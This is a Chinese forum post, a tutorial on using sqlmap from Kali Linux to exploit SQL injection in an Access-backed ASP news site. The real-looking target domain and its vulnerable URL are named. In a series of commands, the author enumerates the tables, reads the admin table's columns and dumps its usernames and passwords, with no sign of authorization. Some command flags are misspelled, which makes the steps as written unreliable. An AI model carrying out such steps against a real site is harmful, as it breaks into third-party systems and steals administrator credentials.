极客中华

?找回密码
?qq免费领红包群
极客中华 ? 门户 ?极客技术 ? 查看内容

Kali linux下sqlmap注入ACCESS数据库

2014-8-13 15:49| 发布者: loong| 查看: 11146| 评论: 0|原作者: 秦(8454 [email?protected]|来自: 投稿

摘要: Kali linux下sqlmap注入ACCESS数据库目标站点:www.qinlicy.com用’判断了存在注入点之后。直接上kali linux用sqlmap注入注入点:http://www.qinlicy.com/NewsShow.asp?id=69首先我们先来跑表命令是sqlmap–u“http: ...

Kali linux下sqlmap注入ACCESS数据库

目标站点:www.qinlicy.com

用’判断了存在注入点之后。直接上kali linux用sqlmap注入

注入点:http://?www.qinlicy.com/NewsShow.asp?id=69

首先我们先来跑表

命令是sqlmap?–u?“http://?www.qinlicy.com/NewsShow.asp?id=69”?–tables


一路上大家遇到这个


可以直接选择回车

等到了这里


大家选择线程1到10

开始扫表。你也可以在出现admin这个表的时候按下ctrl+c就可以终止然后就获取表


然后我们直接再次输入命令sqlmap?–u?“http://?www.qinlicy.com/NewsShow.asp?id=69”?–colunmns?–T admin


然后得到了里面的字段username password id

然后我们直接跑字段内容sqlmap?–u?“http://?www.qinlicy.com/NewsShow.asp?id=69”?–dumps?–T admin?–C?“username,password”


然后一路还是回车。到了


还是选择线程1到10

最后跑出了用户名。密码


文章到此结束


BY:感谢网友秦的投稿。

最新评论

?

小黑屋|手机版|Archiver|极客中华

GMT+8, 2019-9-19 05:28 , Processed in 0.086511 second(s), 22 queries .

Powered by Discuz! X3.2 Designed by Geekzh Team

? 2001-2015 Comsenz Inc.Comsenz Inc.

返回顶部